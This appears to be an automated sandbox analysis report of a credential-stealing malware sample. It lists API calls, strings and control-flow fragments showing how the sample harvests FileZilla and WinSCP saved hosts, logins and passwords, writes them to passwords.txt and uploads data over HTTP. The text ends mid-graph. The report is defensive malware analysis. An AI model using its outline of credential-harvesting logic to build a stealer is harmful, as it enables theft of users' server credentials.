                                      • Instruction ID: bc2d47bca01eab719902f2d98ce0bcc9db22d8f9066ce2e185cb9f43f2864494
                                      • Opcode Fuzzy Hash: 55f00571921764719af5855400606f84d4f61b147230f520fc7534fc8cdb197d
                                      • Instruction Fuzzy Hash: 9BF0A771B0021CABEB2C6B78AC0DEAA7B6DAF56311F044365FD0ADA2D0DB7059194AD1
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00301439
                                      • Process32First.KERNEL32(00000000,00000128), ref: 00301449
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0030145B
                                      • StrCmpCA.SHLWAPI(?,?), ref: 00301470
                                      • CloseHandle.KERNEL32(00000000), ref: 00301482
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: 7123be08aa9355e75a893c3a5c3b7591ba6ae00255e23fa45fcea6e59915320b
                                      • Instruction ID: 91ca58222d47cd99b00ea4e375274ab5449c202bb6f9df4302517455d2c53312
                                      • Opcode Fuzzy Hash: 7123be08aa9355e75a893c3a5c3b7591ba6ae00255e23fa45fcea6e59915320b
                                      • Instruction Fuzzy Hash: 0A11E172941218AFD7218F95DC55BEABBBCFF16740F00816AE90593280DB345A09CBE1
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                      • GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateNameProcessUser
                                      • String ID:
                                      • API String ID: 1296208442-0
                                      • Opcode ID: 182efa57e970614188f5e8d3de72c58bb1a28fbfea4754da526a0de901452209
                                      • Instruction ID: ae50e440eabca8fd9ea1f5e5dcb788726f212f7274afde50d110657100fe3093
                                      • Opcode Fuzzy Hash: 182efa57e970614188f5e8d3de72c58bb1a28fbfea4754da526a0de901452209
                                      • Instruction Fuzzy Hash: F9D012B1501218BFD7059BE59C0DFDA7B6CEB0D7A1F004191FA05D6240D5F0594087E1
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoSystemwsprintf
                                      • String ID:
                                      • API String ID: 2452939696-0
                                      • Opcode ID: 18651e5d6d6fa9526c004e3d5eb32bc25cdcfb46cba343ca856b305fb1876fb7
                                      • Instruction ID: f29f9eb48f0bb2fa7608bf0da877b8d8d6dce17cb4c350f965933be29b9b0843
                                      • Opcode Fuzzy Hash: 18651e5d6d6fa9526c004e3d5eb32bc25cdcfb46cba343ca856b305fb1876fb7
                                      • Instruction Fuzzy Hash: A5D012B5C0020C97CB10DB90EC859E9B77CEF48300F004795EF05A2140E775AA5D8AE5
                                      APIs
                                      • VirtualProtect.KERNEL32(-00001000,00001000,00000004,?,00000000), ref: 00536918
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 14cdbcb8150df80f339bc14e73528d37b26d4ba51bee5190abc436dde297e0c5
                                      • Instruction ID: 8112a5f7ab8fd2dc7ea47b9563927cef793f1c207ad5fd9161472bd83e1f80c0
                                      • Opcode Fuzzy Hash: 14cdbcb8150df80f339bc14e73528d37b26d4ba51bee5190abc436dde297e0c5
                                      • Instruction Fuzzy Hash: AA72BB316083559FD724CF28C88466ABBF1FF89384F158A2DE9A5CB351E371D949CB82

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 00300D50: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00300D81
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • strtok_s.MSVCRT ref: 002FBA5E
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,003101E9,003101E9,003101E9,003101E9), ref: 002FBAA3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FBAAA
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 002FBAC6
                                      • lstrlen.KERNEL32(00000000), ref: 002FBAD1
                                        • Part of subcall function 00301200: malloc.MSVCRT ref: 00301209
                                        • Part of subcall function 00301200: strncpy.MSVCRT ref: 00301219
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 002FBB01
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB0C
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 002FBB42
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB4D
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 002FBB7D
                                      • lstrlen.KERNEL32(00000000), ref: 002FBB88
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC06
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC1E
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC36
                                      • lstrlen.KERNEL32(00000000), ref: 002FBC4E
                                      • lstrcat.KERNEL32(00000000,Soft: FileZilla), ref: 002FBC63
                                      • lstrcat.KERNEL32(00000000,Host: ), ref: 002FBC6F
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBC7F
                                      • lstrcat.KERNEL32(00000000,00313454), ref: 002FBC8B
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBC9B
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCA7
                                      • lstrcat.KERNEL32(00000000,Login: ), ref: 002FBCB3
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBCC3
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCCF
                                      • lstrcat.KERNEL32(00000000,Password: ), ref: 002FBCDB
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 002FBCEB
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBCF7
                                      • lstrcat.KERNEL32(00000000,00313408), ref: 002FBD03
                                        • Part of subcall function 002FF8A0: lstrlen.KERNEL32(002F5B05,00000000,?,?,002F5B05,003101E9), ref: 002FF8AB
                                        • Part of subcall function 002FF8A0: lstrcpy.KERNEL32(00000000,002F5B05), ref: 002FF8E2
                                      • strtok_s.MSVCRT ref: 002FBD47
                                      • lstrlen.KERNEL32(00000000), ref: 002FBD5A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$File$AllocHeapLocalstrtok_s$AllocateCloseCreateFolderHandlePathProcessReadSizemallocstrncpy
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt
                                      • API String ID: 2446915026-935134978
                                      • Opcode ID: 9f9fb75a9a4368811760b3f5a3355f488cd8e781ecb1925d90a18ce818bb6dfd
                                      • Instruction ID: e9361d88f377b4c2d4c0e043860e9984da993fd959c0aecaff02e47b5878780c
                                      • Opcode Fuzzy Hash: 9f9fb75a9a4368811760b3f5a3355f488cd8e781ecb1925d90a18ce818bb6dfd
                                      • Instruction Fuzzy Hash: 34B1757192010D7ADB55FBA0DE56DFEB77CEF25780F444034F602A1192EF206A69CE61

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      • lstrlen.KERNEL32(00000000), ref: 002F4641
                                        • Part of subcall function 00300DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E14
                                        • Part of subcall function 00300DF0: GetProcessHeap.KERNEL32(00000000,?,?,002F4635,?,?,?,?,?,?), ref: 00300E23
                                        • Part of subcall function 00300DF0: RtlAllocateHeap.NTDLL(00000000), ref: 00300E2A
                                      • StrCmpCA.SHLWAPI(?,02F43058,003101E9,003101E9,003101E9,003101E9), ref: 002F46A6
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F46CC
                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F47B0
                                      • HttpOpenRequestA.WININET(00000000,02F431B8,?,02F45FE0,00000000,00000000,?,00000000), ref: 002F47ED
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F4812
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,02F34F90,00000000,?,00313358,00000000,?,?), ref: 002F4C21
                                      • lstrlen.KERNEL32(00000000), ref: 002F4C33
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002F4C45
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002F4C4C
                                      • lstrlen.KERNEL32(00000000), ref: 002F4C5E
                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 002F4C72
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 002F4C8B
                                      • memcpy.MSVCRT(?), ref: 002F4C95
                                      • lstrlen.KERNEL32(00000000), ref: 002F4CA6
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002F4CBF
                                      • memcpy.MSVCRT(?), ref: 002F4CCC
                                      • lstrlen.KERNEL32(00000000,?,00000000), ref: 002F4CE2
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002F4CF3
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F4D1A
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F4D5F
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F4DB3
                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 002F4DCB
                                      • ExitProcess.KERNEL32 ref: 002F4DD6
                                      • InternetCloseHandle.WININET(00000000), ref: 002F4DE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocateFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                      • String ID: ------$"$--$------$ERROR$block$build_id$file_data
                                      • API String ID: 3957834146-1063948816
                                      • Opcode ID: 31a61a2bdf007dd3141a65a2a2df3fbce073c759bae66213772e7dfd84d56491
                                      • Instruction ID: 00717d2d775413aa9c03d13362bb2bc07e599fd953edfd4c864573a7615fe65a
                                      • Opcode Fuzzy Hash: 31a61a2bdf007dd3141a65a2a2df3fbce073c759bae66213772e7dfd84d56491
                                      • Instruction Fuzzy Hash: DC421D72C2010DAEDB55EBA0DD92DFEB778AF14780F508139F61262291DF306A59CF64

                                      Control-flow Graph

                                      control_flow_graph 1055 2fe3c0-2fe446 memset * 4 RegOpenKeyExA 1056 2fe47e-2fe4a4 call 2ff890 * 4 1055->1056 1057 2fe448-2fe46e RegGetValueA 1055->1057 1059 2fe4a5-2fe4a8 1057->1059 1060 2fe470-2fe472 1057->1060 1059->1060 1062 2fe4aa-2fe4ac 1059->1062 1060->1056 1063 2fe474-2fe47b RegCloseKey 1060->1063 1065 2fe4ae-2fe4b5 RegCloseKey 1062->1065 1066 2fe4b8-2fe4cd RegOpenKeyExA 1062->1066 1063->1056 1065->1066 1068 2fe859-2fe867 call 2f1050 1066->1068 1069 2fe4d3-2fe4ef RegEnumKeyExA 1066->1069 1072 2fe515-2fe51d call 2ff810 1069->1072 1073 2fe4f1-2fe4f6 1069->1073 1078 2fe522-2fe5d9 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA 1072->1078 1073->1068 1077 2fe4fc-2fe514 RegCloseKey call 2f1050 1073->1077 1101 2fe5db-2fe612 call 301240 call 2ff940 call 2ff8f0 call 2ff890 1078->1101 1102 2fe614-2fe631 call 2ff9a0 call 2ff8f0 1078->1102 1111 2fe637-2fe72c call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 RegGetValueA call 2ff9a0 call 2ff8f0 call 2ff890 StrCmpCA 1101->1111 1102->1111 1142 2fe72e-2fe75a call 2fdd90 1111->1142 1143 2fe793-2fe7e2 call 2ff9a0 call 2ff8f0 call 2ff890 RegEnumKeyExA 1111->1143 1149 2fe75e-2fe782 call 2ff9a0 call 2ff8f0 call 2ff890 1142->1149 1150 2fe75c 1142->1150 1143->1078 1157 2fe7e8-2fe845 call 2ffa50 lstrlen call 2ffa50 call 2ff810 call 2f1080 call 3042a0 call 2ff890 1143->1157 1149->1143 1164 2fe784-2fe790 call 3014b0 1149->1164 1150->1149 1176 2fe847-2fe84e RegCloseKey 1157->1176 1177 2fe851-2fe854 call 2ff890 1157->1177 1164->1143 1176->1177 1177->1068
                                      APIs
                                      • memset.MSVCRT ref: 002FE3E4
                                      • memset.MSVCRT ref: 002FE3FE
                                      • memset.MSVCRT ref: 002FE40C
                                      • memset.MSVCRT ref: 002FE41A
                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 002FE442
                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 002FE467
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE475
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE4AF
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 002FE4C9
                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 002FE4E7
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE4FD
                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,003101E9), ref: 002FE58A
                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 002FE5D5
                                      • RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 002FE682
                                      • RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,00000000,?,00313408,00000000,?,?), ref: 002FE6F4
                                      • StrCmpCA.SHLWAPI(?,003101E9,00000000,?,Password: ), ref: 002FE724
                                      • RegEnumKeyExA.ADVAPI32(?,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00313684), ref: 002FE7D7
                                      • lstrlen.KERNEL32(00000000), ref: 002FE7F1
                                      • RegCloseKey.ADVAPI32(?), ref: 002FE848
                                        • Part of subcall function 002FDD90: GetProcessHeap.KERNEL32(00000008,?), ref: 002FDDD8
                                        • Part of subcall function 002FDD90: RtlAllocateHeap.NTDLL(00000000), ref: 002FDDDF
                                        • Part of subcall function 002FDD90: GetProcessHeap.KERNEL32(00000000,?), ref: 002FDDF4
                                        • Part of subcall function 002FDD90: HeapFree.KERNEL32(00000000), ref: 002FDDFB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocateFreelstrcat
                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                      • API String ID: 751369145-2798830873
                                      • Opcode ID: cebd77955f700822d8f9b3d7bcae12cd42b8346600569c43c545751e3317898e
                                      • Instruction ID: 5fb92e3f843c759de9eda4583ae96d81005ee0380f0fdc11af46ba99084fd814
                                      • Opcode Fuzzy Hash: cebd77955f700822d8f9b3d7bcae12cd42b8346600569c43c545751e3317898e
                                      • Instruction Fuzzy Hash: 85D13DB292021DAEDB15EBA0CD91EFEB37CAF54780F404579F605A2191EB706B58CF60

                                      Control-flow Graph

                                      control_flow_graph 1276 3044b0-304f76 call 2ff810 call 2ff9a0 call 2ff8f0 call 2ff890 call 2f1ec0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb60 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300340 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3003e0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300420 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 GetCurrentProcessId call 301090 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3005a0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300730 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 300900 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb20 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffae0 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 3002c0 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffc30 call 2ff940 call 2ff8f0 call 2ff890 * 2 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffb60 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ff9a0 call 2ff8f0 call 2ff890 call 2ffbc0 call 2ff9a0 call 2ff8f0 
